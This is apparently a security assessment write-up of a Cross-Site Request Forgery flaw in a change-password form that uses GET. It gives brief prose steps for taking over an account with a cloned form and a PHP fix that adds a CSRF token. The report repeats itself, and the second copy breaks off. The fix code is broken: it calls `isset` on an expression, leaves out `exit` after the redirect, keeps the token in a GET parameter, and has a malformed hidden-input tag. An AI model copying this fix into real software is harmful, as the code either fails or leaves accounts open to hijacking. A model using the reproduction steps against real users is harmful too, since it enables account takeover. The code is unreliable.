A request is sent from the targets browser with an active session and triggers a malicious action.
Located
Change Password
HTTP request type
GET
Vunerable parameter / behaviour
The change password form trusts that any input coming from a request with the same parameters as being valid, making it subject to a CSRF attack where a malicious user could take over a users account by changing their password on them.
Payload / actions for reproduction
Replicate the form
Hide the real 'new password' field for your own version
Send the link to the user
When the user changes their password from the form, you're password is the one that it is actually being saved.
Code fix
Generate a unique CSRF token for each form, store it in the users session and echo inside a hidden form field to send it back to the server on the request being sent.
<input type="hidden" name="csrf" value=<?php echo $_SESSION['csrf']?>\>
<button type="submit" name="reset" value="yes">Reset</button>
<?php
//Generate CSRF token in Here
if (empty($_SESSION['csrf'])) {
$_SESSION['csrf'] = bin2hex(random_bytes(8));
}
?>
if(!isset($_GET['csrf'] || $_GET['csrf'] != $_SESSION['csrf'])) {
// Assuming form is malicious, so we're logging them out
header("Location: ../logout.php");
}
Vulnerability
Cross-Site Request Forgery
Description
A request is sent from the targets browser with an active session and triggers a malicious action.
Located
Change Password
HTTP request type
GET
Vunerable parameter / behaviour
The change password form trusts that any input coming from a request with the same parameters as being valid, making it subject to a CSRF attack where a malicious user could take over a users account by changing their password on them.
Payload / actions for reproduction
Code fix
Generate a unique CSRF token for each form, store it in the users session and echo inside a hidden form field to send it back to the server on the request being sent.